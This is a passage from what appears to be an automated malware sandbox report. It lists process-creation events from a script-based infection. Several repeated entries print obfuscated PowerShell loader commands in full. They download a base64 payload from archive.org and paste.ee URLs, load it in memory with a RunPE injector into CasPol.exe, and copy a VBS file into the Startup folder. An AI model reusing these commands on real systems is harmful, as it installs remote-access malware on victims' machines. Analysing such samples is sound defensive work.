[Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\public\documents\pow\wm.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\public\documents\pow\wm.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\public\documents\pow\wm.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = 